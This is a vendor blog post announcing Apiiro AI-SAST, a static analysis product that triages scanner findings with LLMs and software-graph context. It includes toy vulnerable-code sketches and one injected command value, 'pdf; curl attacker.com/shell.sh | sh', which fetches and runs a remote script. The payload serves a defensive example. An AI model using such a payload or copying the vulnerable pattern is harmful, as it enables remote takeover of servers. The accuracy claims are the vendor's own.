
Introducing Apiiro AI-SAST: Static Scanning Reimagined – From Code to Runtime

Matan Giladi
Security Researcher
Neta Coral
Principal Product Manager
Published December 18, 2025 · 12 min read

Static Application Security Testing (SAST) is a legacy technology, invented decades ago and largely unchanged since. With the rapid adoption of AI coding assistants and agentic coding tools, development velocity and the application attack surface have increased exponentially, pushing traditional SAST beyond its breaking point. What was once an application security engineer and developer problem has now escalated to CISOs, CTOs, and CIOs – because it directly impacts business growth by slowing and blocking software delivery.

For years, the industry has relied on SAST scanners that excel at pattern matching but lack a deep understanding of each repository’s software architecture graph from code to runtime. The result is a constant flood of alerts that overwhelms security teams, slows development, and erodes trust in the findings. At today’s development velocity, this noise doesn’t just create friction – it actively blocks the business.

But the challenge goes beyond noise; it’s also about blind spots. Traditional SAST scanners can only detect what they have signatures for. They often miss subtle, complex business-logic flaws that are unique to your software’s architecture and data flows – the very vulnerabilities attackers actually exploit.

Today, we’re excited to introduce Apiiro AI-SAST – a new capability within the Apiiro platform that reimagines static analysis for modern, AI-driven software development. Apiiro AI-SAST goes beyond scanning to validate and fix code risks with the precision of an expert application security engineer, grounded in deep software architectural context from code to runtime.

The Landscape

The “noise” problem in SAST isn’t new, but the stakes have changed. We are seeing a massive influx of AI-generated code, increasing code velocity by 4x and risk by 10x.

Traditional SAST tools, which rely on rigid pattern matching, simply cannot keep up. They flag everything that looks like a vulnerability, regardless of whether it’s actually reachable, exploitable, or material to the business.

We’ve seen other attempts to solve this with naive “AI assistants” acting as “LLM wrappers” – offering chat-based help, sending the code as-is to an external LLM, and presenting its output as a simple auto-triage.

While impressive in demos or at open-source scale, these approaches often fail at enterprise scale, mainly because they lack a deep structural understanding of the code itself. They might tell you what a vulnerability is, but they struggle to definitively tell you if it matters in your specific software architecture graph – from code to runtime environment. At Apiiro, we realized that to truly solve this, we needed a “defense-in-depth” strategy – one that combines the scalability of scanners with the reasoning of an expert.

Our Approach: Giving the AI a Map

Our approach fundamentally shifts SAST from a detection problem to a risk validation and fix problem. We didn’t just bolt an LLM onto raw source code; we rebuilt the SAST engine to mimic the cognitive process of an expert application security researcher, using all the tools that such a researcher would utilize:

  • Data: a software graph that represents the architecture across multiple code modules and repositories, including call flow, data flow, and reachability analysis.
  • Knowledge: Deep know-how and professional best practices for detecting, triaging, and fixing code vulnerabilities – expertise accumulated through the analysis of thousands of real-world scenarios in Fortune 500 enterprises.
  • Context: a deep understanding of the application attack surface – from inventorying all code resources (APIs, data models, OSS dependencies, internal packages, AI models, secrets, and many more) to linking runtime exposure, business criticality, and active security controls – to distinguish between a theoretical flaw and a true business risk.

Here is how it works:

1. AST + LLM/Agent Symbiosis: The Best of Both Tools

Traditional AST provides the structure (the syntax tree), while LLMs provide the semantic understanding (the intent). The AI-SAST solution is therefore built in two complementary layers:

  1. Detection and lead generation layer: This is where we leverage the AST tech advantage (speed & determinism) as a “lead generator.” It is fast, deterministic, and can scan millions of lines of code to find every possible structural flaw (the “haystack”). However, it suffers from a lack of semantic understanding, leading to noisy results and false positives.
  2. Triage and fix layer: This is where the LLM and agentic loop advantage (reasoning & data analysis) comes into play. Large Language Models excel at semantic reasoning – understanding intent, variable naming, and logic flow just like a human. However, on their own, they are slow, prone to hallucinations, and expensive to run on entire codebases.

The Apiiro ‘Blend’: We use AST technology to rapidly identify potential signals, and then use a specialized AI agent to act as a “virtual researcher” – leveraging out-of-the-box expert knowledge of a world-class vulnerability researcher on top of the rich Apiiro context. The result: you get the coverage of a scanner with the precision of a human application security researcher, amplifying the advantages of both technologies.
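To make the division of labor concrete, here is a minimal sketch of the two-layer blend. All names, data, and signatures are hypothetical illustrations, not Apiiro’s actual interfaces: a crude AST-style pass generates noisy leads, and a simple rule stands in for the LLM/agentic triage layer, which confirms or dismisses each lead using graph context.

```python
def ast_lead_generator(files):
    """Layer 1: fast, deterministic pattern pass (high recall, noisy)."""
    leads = []
    for path, source in files.items():
        for lineno, line in enumerate(source.splitlines(), 1):
            if "execute(" in line and "+" in line:   # crude SQL-injection signal
                leads.append({"file": path, "line": lineno, "rule": "sqli"})
    return leads

def triage_agent(lead, graph):
    """Layer 2: stand-in for the LLM/agentic loop, grounded in graph context."""
    ctx = graph.get(lead["file"], {})
    if ctx.get("sanitized_upstream"):
        return dict(lead, verdict="false_positive")
    if ctx.get("internet_facing"):
        return dict(lead, verdict="true_positive")
    return dict(lead, verdict="needs_review")

# Toy input: one file with string-concatenated SQL, plus graph context for it.
files = {"orders.py": 'db.execute("SELECT * FROM t WHERE id=" + user_id)'}
graph = {"orders.py": {"internet_facing": True, "sanitized_upstream": False}}
results = [triage_agent(lead, graph) for lead in ast_lead_generator(files)]
```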

AI-SAST Agentic Loop

Each detected finding pattern goes through tailored evaluation at the second layer. Our AI agentic loop constructs a tailored triage workflow based on the specific security-issue pattern, and grounds the LLM with the most accurate and relevant examples.

2. Deep Code Analysis (DCA): The “Data Fabric” Behind the AI

An LLM/agent is only as good as the context you feed it. Apiiro removes the guesswork by grounding our AI in Deep Code Analysis (DCA). DCA technology continuously discovers and inventories all code resources across all material changes, and builds – with enterprise scale and accuracy – a comprehensive Software Graph of your entire codebase before the AI even looks at it. It maps:

  • Applicative structure (control flow + data flow): e.g., understanding that this specific Java class is a Controller and that variable is a verified user ID.
  • Extended application inventory: discovering and inventorying every API, OSS dependency, internal package, AI model, and data model and field, along with their relations.
  • Technology stack: mapping the tech stack used by the code across 750+ categories, e.g., security controls (authz, authn, encryption), data storage and access (data stores, data access patterns), development tools (languages, utilities, test frameworks), applicative components (web, UI, MQ, logging, MCP server), and many more.

Why this matters: When Apiiro AI-SAST assesses a potential vulnerability and later decides how to fix it, it isn’t looking only at lines of code or specific files; it’s looking at a Software Graph. For example, in the case of a potential SQL injection, it “knows” things like:

  • Whether the input is sanitized multiple layers deep in the call stack.
  • Which code paths are non-production – test environments or development artifacts – and can be filtered out as noise.
  • Where the most effective fix location is.
  • Which common frameworks and coding patterns the organization already uses for sanitization elsewhere.
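A toy illustration of the kind of graph reasoning described above – checking whether input is sanitized deeper in the call stack – might look like this (all function names and graph data are hypothetical):

```python
CALL_GRAPH = {                         # caller -> callee (toy, linear chain)
    "api_handler": "normalize_input",
    "normalize_input": "build_query",
    "build_query": "db_execute",
}
SANITIZERS = {"normalize_input"}       # functions known to sanitize input

def path_to_sink(entry, sink):
    """Walk the call chain from the entry point down to the sink."""
    path, node = [entry], entry
    while node != sink:
        node = CALL_GRAPH[node]
        path.append(node)
    return path

def is_sanitized(entry, sink):
    # the scanner only sees "input reaches db_execute"; the graph sees the
    # sanitizer one layer deeper in the call stack
    return any(fn in SANITIZERS for fn in path_to_sink(entry, sink))
```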

By grounding the AI in the reality of the software architecture graph and tech stack, Apiiro eliminates inconsistencies, inaccuracies, and generic answers – and delivers risks and fixes that are real and actionable in your specific environment.

3. Code-to-Runtime (C2R): True Risk Reality

Real risk isn’t about finding “bad code”, but knowing whether it actually has any impact. Apiiro leverages code-to-runtime ‘Applicative Fingerprinting’, based on Deep Code Analysis (DCA) technology, to automatically and continuously – without any human labor – map code resources (e.g., APIs, OSS dependencies, code modules) to the specific build and deployment location of their container artifacts or exposing API endpoints.

This allows us to distinguish between a theoretical risk and a real-world crisis, solving the blind spots between code-scanning-only and cloud-infrastructure-only approaches.

Consider a scenario where a developer introduces a SQL injection vulnerability in an API explicitly annotated as /internal/stock-check. Other SAST tools would see the “/internal” path and dismiss the finding as low-risk, assuming it’s unreachable from the outside world. Similarly, cloud security tools would overlook it because the container infrastructure itself is securely configured.

However, in modern architectures, an API gateway often sits in front of these services, rewriting public URLs to internal ones – for example, routing public traffic from api.shop.com/products directly to that “internal” stock-check function.

Apiiro Code-to-Runtime matching connects these dots. By correlating runtime traffic with code definitions, Apiiro recognizes that this “internal” function is actually receiving direct public traffic. It can automatically escalate the vulnerability to Critical, alerting you that a SQL injection is live and exposed to the internet, despite what the code annotations might suggest.
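As a hypothetical illustration of this code-to-runtime correlation, consider a tiny rewrite table: the gateway maps a public route onto the “internal” path, so the effective exposure differs from what the code annotation claims (all paths and data are invented for this example):

```python
GATEWAY_REWRITES = {                   # public path -> internal service path
    "/products": "/internal/stock-check",
}
CODE_ANNOTATIONS = {                   # path declared in code -> claimed exposure
    "/internal/stock-check": "internal-only",
}

def effective_exposure(internal_path):
    # if any public route rewrites to this path, it is internet-facing,
    # regardless of what the code annotation claims
    if internal_path in GATEWAY_REWRITES.values():
        return "internet-facing"
    return CODE_ANNOTATIONS.get(internal_path, "unknown")
```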

4. AI Fix: Beyond “Generic” Fix Suggestions

Detecting a vulnerability is only half the battle; fixing it without breaking the application is the real challenge. Because standard SAST tools lack context, they often suggest local “band-aid” fixes on the specific line of code where the error appears. This leads to code bloat and repetitive work.

Apiiro leverages our Software Graph to guide remediation at the source: 

  • Root cause analysis: Traces vulnerabilities back through the Software Graph to identify the primary source of the vulnerability, avoiding noisy, shallow, and incomplete fixes.
  • Smart location: Instead of patching ten different API endpoints, Apiiro can identify the single shared middleware or validation filter where a fix will secure the entire application.
  • Contextual fixes: Generating precise code modifications using your existing frameworks and code patterns, reducing the time developers spend researching the correct implementation and fixing with minimal intervention.
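A toy sketch of the “smart location” idea: given a set of vulnerable endpoints and the middleware chains they already pass through, find a single shared choke point where one fix covers them all (all names and data are hypothetical):

```python
ENDPOINT_MIDDLEWARE = {                # endpoint -> middleware chain (toy data)
    "/orders":   ["request_logger", "input_filter"],
    "/users":    ["request_logger", "input_filter"],
    "/payments": ["request_logger", "input_filter", "audit"],
}

def best_fix_location(vulnerable_endpoints):
    """Return a middleware shared by every vulnerable endpoint (a single
    choke point for the fix), or None if no common one exists."""
    chains = [set(ENDPOINT_MIDDLEWARE[e]) for e in vulnerable_endpoints]
    shared = set.intersection(*chains)
    return sorted(shared)[0] if shared else None   # deterministic pick
```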

While we currently deliver these architectural insights directly to developers to guide their work (as part of Apiiro’s Autofix Agent), we are actively developing the capability to package these insights into a complete, validated fix – closing the loop from detection to deployment.

5. Adaptive Feedback: Evolving Accuracy with Human Context 

Accuracy is a moving target, which is why the AI-SAST engine is designed to adapt to each customer’s specific environment. We put you in control of the “noise filter” at two levels:

  • Foundation tuning: Customers can customize the underlying AST detection rules to ensure the initial scan aligns with the organization’s coding standards.
  • Algorithmic feedback: When a user overrides an AI determination (e.g., marking a finding as “False Positive”), we use that signal to refine our models. This “human-in-the-loop” feedback ensures that Apiiro AI SAST doesn’t just learn generic patterns – it learns your logic.

Examples

“Apiiro’s AI-SAST, powered by Deep Code Analysis (DCA), reduced false positives by over 85% within weeks. By mapping SAST risks to internet-facing API entry points, we can confidently prioritize real exploited risks and help our developers increase development velocity.” – Jason Espone, Global Head of Application Security at C.H. Robinson

By mimicking the investigative process of a human expert, Apiiro AI-SAST delivers highly qualified risks, not just alerts. Here are two authentic examples from a single enterprise customer’s repository, anonymized and renamed for clarity:

True Positives (TP): Verified Data-Flow Reachability

The following Critical Remote Code Execution is visible only by applying contextual AI reasoning over the Software Graph. 

The payload and execution are separated by time and location: a forgotten endpoint poisons the system state, planting a payload that a separate periodic job executes later. What appears to be safe internal data flow is actually a dormant exploit.

Details: Notice the command execution at the end of this snippet. When the initiator is a periodic summary job (msum), a parameter called format gets added to it:
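The original snippet is not reproduced here; the following is a minimal, hypothetical reconstruction of the pattern described, with all names invented for illustration:

```python
import subprocess

def build_report_command(job):
    cmd = "render_report --job " + job["id"]
    if job["initiator"] == "msum":                 # periodic summary job
        cmd += " --format " + job["report_format"] # format appended unescaped
    return cmd

def run_report(job):
    # the command-execution sink at the end of the flow
    subprocess.run(build_report_command(job), shell=True)
```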

Looking at the API endpoint, it does not modify report_format or initiator – they stay safe, internal properties:
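Again, a hypothetical reconstruction of the endpoint described (names invented): the user-facing request only sets harmless presentation fields, while initiator and report_format remain fixed internal properties:

```python
JOBS = {}   # in-memory stand-in for the job store

def api_request_report(request, job_id):
    JOBS[job_id] = {
        "id": job_id,
        "title": request.get("title", "report"),  # user-controlled, harmless
        "initiator": "msum",                      # fixed internal property
        "report_format": "pdf",                   # fixed internal property
    }
    return {"status": "scheduled"}
```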

However, in a remote part of the code, there’s an endpoint that configures periodic jobs:
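A hypothetical reconstruction of the job-configuration endpoint described (names invented): it copies arbitrary request fields into the stored job, including report_format, and carries no auth decorator:

```python
JOBS = {}   # in-memory stand-in for the job store

def api_configure_job(request, job_id):   # note: no @require_auth decorator
    job = JOBS.setdefault(job_id, {"id": job_id})
    job.update(request)                   # lets callers overwrite report_format
    return {"status": "updated"}
```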

The problem: this endpoint lets a user set the value of report_format. Worse – because it’s not part of the UI, the developer forgot access control (notice the missing auth decorator) – so anyone can call it.

While only the automated job can trigger the command execution, sending the following to this endpoint allows attackers to take over the server:

format="pdf; curl attacker.com/shell.sh | sh"

False Positives (FP): Evidence-Based Dismissal

Dismissing this alert of Critical Remote Code Execution is possible only by solving two distinct analysis problems simultaneously: Class-level Data Flow and Configuration-Aware Control Flow. Again, this is impossible without applying contextual AI reasoning over the Software Graph.

Most tools incorrectly flag this because user input hits a shell command. However, the Software Graph proves that every path is blocked: one by strict validation logic buried in a constructor, and the other by a configuration flag that renders the code unreachable.

Details: A notification service renders alert templates. A scanner flags command execution because self.channel is interpolated directly into a shell command:
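The flagged snippet is not reproduced here; a minimal, hypothetical reconstruction of the sink (names invented) might look like:

```python
import subprocess

class NotificationRenderer:
    # (constructor and other methods omitted from this snippet)

    def build_command(self, template_path):
        # self.channel is interpolated directly into a shell command string
        return f"notify-send --channel {self.channel} < {template_path}"

    def render_alert(self, template_path):
        # the execution sink the scanner flags
        subprocess.run(self.build_command(template_path), shell=True)
```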

The data flow starts at the main API endpoint, where the user controls the channel parameter:
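A hypothetical reconstruction of the entry point (names invented), with a stub class standing in for the real renderer:

```python
class NotificationRenderer:   # stub standing in for the real class
    def __init__(self, channel):
        self.channel = channel

def api_send_alert(request):
    # the caller fully controls `channel`; this is where tainted data enters
    channel = request.get("channel", "email")
    return NotificationRenderer(channel)
```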

Why it’s safe (Path A – Validation): Tracing the NotificationRenderer class reveals that channel is validated against a strict allowlist in the constructor before assignment. The scanner sees “input in command,” but the Software Graph sees “constrained input”:
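A hypothetical reconstruction of the validating constructor (names invented):

```python
ALLOWED_CHANNELS = {"email", "sms", "slack"}

class NotificationRenderer:
    def __init__(self, channel):
        # Path A: strict allowlist validation before assignment
        if channel not in ALLOWED_CHANNELS:
            raise ValueError(f"unsupported channel: {channel!r}")
        self.channel = channel
```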

Why it’s safe (Path B – Unreachable): A legacy method bypasses this validation, seemingly re-introducing the risk:
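A hypothetical reconstruction of the legacy bypass and its gated call site (names invented; the flag resolution mirrors the configuration analysis described in the text):

```python
LEGACY_PARTNER_MODE = False   # resolved from config; never enabled in production

class NotificationRenderer:
    def __init__(self, channel):
        self.channel = channel            # (allowlist validation elided here)

    def set_channel_unchecked(self, channel):
        # legacy path: bypasses the constructor's allowlist validation
        self.channel = channel

def notify_partner(renderer, raw_channel):
    if LEGACY_PARTNER_MODE:               # Path B gate: defaults to False
        renderer.set_channel_unchecked(raw_channel)
```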

However, tracing the control flow back to the call site reveals a gating condition: LEGACY_PARTNER_MODE. By resolving the configuration state, we see this flag defaults to False and is never enabled in the production environment.

Standard tools flag both paths. One because they miss the validation, the other because they can’t resolve the config. Contextual AI reasoning proves both are safe, filtering out noise that would otherwise waste developer time.

Benchmarks

During its development, and while working with large enterprise customers, we have been benchmarking our AI-SAST against a “True Set” – a validated dataset of true and false positives confirmed by human experts – and comparing performance directly against other leading traditional SAST vendors. Here are the principles for this evaluation and some early results:

Validation on Real Enterprise Data (Not Just OSS)

It is easy to test accuracy using curated open-source benchmark apps like WebGoat. In our experience, this often creates misleading results, as their code is highly unrealistic. Real-world enterprise code is fundamentally different – it is massive, messy, laden with legacy debt, and built on custom internal frameworks. An AI model that performs perfectly on a clean, 50-file GitHub repository often crumbles when faced with a 5-million-line monolith.

Our Approach: We benchmark Apiiro AI SAST against a “True Set” derived from real production environments, proving we can effectively find novel vulnerabilities and filter noise in the chaotic, high-scale environments where your developers actually work.

The true set included 322 separate cases of true vulnerabilities, mapped by Apiiro researchers across dozens of production repositories.

                  Precision    Recall
Apiiro AI-SAST       94%        90%

For sanity, we also compared our results against those of a few leading legacy SAST vendors, who came in at a precision of only 24%–27% and a recall of less than 50%. The low recall rates can be attributed to a pre-AI approach that fine-tunes rule logic via static analysis and excludes high-noise rules instead of triaging them effectively.

Precision – how many of the results detected by the tool were true.
Recall – how many of the real true cases in the true set were detected.

Wrapping It All Together: The End-to-End Platform Advantage

An accurate finding is useless if it gets lost in a PDF report or buried in a Jira backlog. This is where the power of the Apiiro platform transforms AI insights into operational reality. Apiiro AI SAST is embedded within the Apiiro Risk Graph so it can drive action through enterprise-grade workflows.

The Risk Graph: Your Contextual Engine

Apiiro’s Risk Graph builds a multi-dimensional map connecting your code, runtime environment, developers, organizational policies, and business impact. It transforms the AI-SAST engine’s verdict that ‘this is a real vulnerability’ into a decision about whether and how much it matters to you, and enables dynamic policies such as:

A “High Severity” SQL Injection identified as true-positive is escalated to “Critical Block” if it touches PII data in a repository in-scope for GDPR. Conversely, it might be downgraded if it’s in a sandboxed demo app.
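Such a policy could be expressed, schematically, like this (field names and severity labels are hypothetical illustrations, not Apiiro's policy syntax):

```python
def apply_policy(finding, repo):
    # escalate verified findings that touch regulated data; downgrade
    # findings that live in sandboxed demo apps
    if finding["verdict"] != "true_positive":
        return finding
    if repo["touches_pii"] and "GDPR" in repo["compliance_scope"]:
        finding["severity"] = "Critical Block"
    elif repo["environment"] == "sandbox":
        finding["severity"] = "Low"
    return finding
```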

It also empowers you to ask complex questions about your environment, such as, “Show me all internet-facing APIs written in Java that access financial data and have unmitigated AI-verified vulnerabilities.”

Workflows: Automation at Enterprise Scale

Finding the risk is step one. Fixing it at the scale of 10,000 developers is step two. Apiiro’s Workflow engine takes the verified, high-context risks and routes them across the organization with surgical precision.

  • Instead of spamming a general security channel, the platform uses code owners identified by the risk graph (read more about that here: building-bridges-between-security-and-rd-apiiros-continuous-investment-in-finding-the-right-code-owner) to route the fix request directly to the specific developer who wrote and/or owns the code, via the tools they use (Slack, MS Teams, Jira).
  • You can set granular enforcement rules, e.g. for a “Confidence: High” AI-verified finding in a high-risk repo, you can block the PR automatically. For lower-confidence or internal-only issues, you can simply comment on the PR or create a ticket for later review.

Availability 

The Apiiro AI-SAST is available in preview for Apiiro customers. See Apiiro AI-SAST in action.